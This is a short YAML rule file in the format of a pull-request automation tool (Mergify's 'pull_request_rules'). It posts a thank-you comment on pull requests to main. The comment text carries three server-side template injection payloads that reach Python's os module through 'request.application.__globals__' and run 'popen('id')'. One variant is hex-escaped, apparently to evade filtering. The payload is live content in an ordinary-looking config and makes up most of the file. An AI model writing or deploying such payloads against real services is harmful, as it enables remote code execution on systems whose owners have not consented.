pull_request_rules:
  - name: "Template"
    conditions:
      - "base=main"
    actions:
      comment:
        message: Thank you for your contribution @{{author}} {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} {{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']()}} {{request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('id')['read']()}}